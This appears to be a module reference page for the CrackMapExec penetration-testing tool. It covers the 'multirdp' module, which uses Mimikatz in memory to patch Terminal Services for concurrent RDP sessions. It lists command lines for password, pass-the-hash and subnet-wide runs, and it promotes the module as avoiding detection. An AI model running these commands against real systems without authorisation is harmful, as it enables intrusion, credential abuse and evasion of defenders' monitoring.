CrackMapExec Multirdp (mssql)


This page contains detailed information about how to use the multirdp CME module while using the mssql protocol. For list of all CrackMapExec modules, visit the CrackMapExec Module Library.

Description


This module patches terminal services in memory to allow multiple RDP users. It works by executing PowerSploit's Invoke-Mimikatz.ps1 script and issuing privilege::debug, ts::multirdp commands.

The multirdp module is OPSEC safe. This means that it doesn't touch the disk and therefore shouldn't trigger any alarms.

Supported Protocols


  • mssql
  • smb

Module Source Code


Authors


Module Usage


This is how to use the multirdp module while using the mssql protocol:

Syntax:
# cme mssql <TARGET[s]> -u <USERNAME> -p <PASSWORD> -d <DOMAIN> -M multirdp

Admin user:
# cme mssql 10.0.5.1 -u sa -p P@ss123 -d . -M multirdp
# cme mssql 10.0.5.1 -u sa -p P@ss123 --local-auth -M multirdp

Normal user:
# cme mssql 10.0.5.1 -u dbuser -p P@ss123 -d target.corp -M multirdp

CrackMapExec also supports passing the hash, so you can specify NTLM hash instead of a password:

# cme mssql 10.0.5.1 -u sa -H 432b022dc22aa5afe884e986b8383ff2 -d . -M multirdp
# cme mssql 10.0.5.1 -u dbuser -H 432b022dc22aa5afe884e986b8383ff2 -d target.corp -M multirdp
The multirdp module can be also used against multiple hosts. Here's how to run it against multiple hosts:

# cme mssql target_list.txt -u sa -p P@ss123 -d . -M multirdp
# cme mssql 10.0.5.0/24 -u sa -p P@ss123 -d . -M multirdp
# cme mssql 10.0.5.1-100 -u sa -p P@ss123 -d . -M multirdp

Module Options


As you can see below, the multirdp module doesn't have any additional options:

# cme mssql -M multirdp --options
[*] multirdp module options:

References


Version


This page has been created based on CrackMapExec version 5.1.7dev.
Visit CrackMapExec Module Library for more modules.